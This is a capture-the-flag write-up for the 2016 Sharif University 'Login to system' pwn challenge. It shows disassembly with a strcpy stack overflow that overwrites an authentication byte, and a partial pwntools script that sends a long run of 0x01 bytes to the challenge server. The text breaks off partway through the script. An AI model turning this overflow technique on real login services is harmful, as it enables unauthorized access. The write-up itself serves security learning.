Login to system
[Sharif University CTF, 2016]
- Category: pwn
- Points: 100
- Description:
Can you login to this system without username and password?
telnet ctf.sharif.edu 27515
Download Question.zip
The binary we were given was a threaded TCP server. The connection handling
function is at 0x00400de4
. It asks for username and password. The goal is to
login without username/password. The following piece of code checks whether a
a byte on the stack is 0x01
and then executes code that apparently reads the
flag and sends it to us.
│ 0x00400f91 488d45e0 lea rax, [rbp-local_4]
│ 0x00400f95 0fb600 movzx eax, byte [rax]
│ 0x00400f98 3c01 cmp al, 1
Fortunately right before this check there is a call to strcpy:
│ 0x00400f78 488d95d0fbff. lea rdx, [rbp-local_134]
│ 0x00400f7f 488d8520fbff. lea rax, [rbp-local_156]
│ 0x00400f86 4889d6 mov rsi, rdx
│ 0x00400f89 4889c7 mov rdi, rax
│ 0x00400f8c e80ffcffff call sym.imp.strcpy
So a stack based buffer overflow and overwriting a local variable. This is
easy. With a quick pwntools
script we are able to get the flag:
from pwn import * # NOQA
context.os = "linux"
context.arch = "amd64"
context.log_level = "debug"
vulnbin = "./Question"
velf = ELF(vulnbin)
vp = remote("ctf.sharif.edu", 27515)
username = "yomama"
password = "\x01" * 1050
x = vp.recvuntil("enter:")
assert "username" in x
x = vp.recvuntil("enter:")
assert "password" in x
with context.local(log_level='debug'):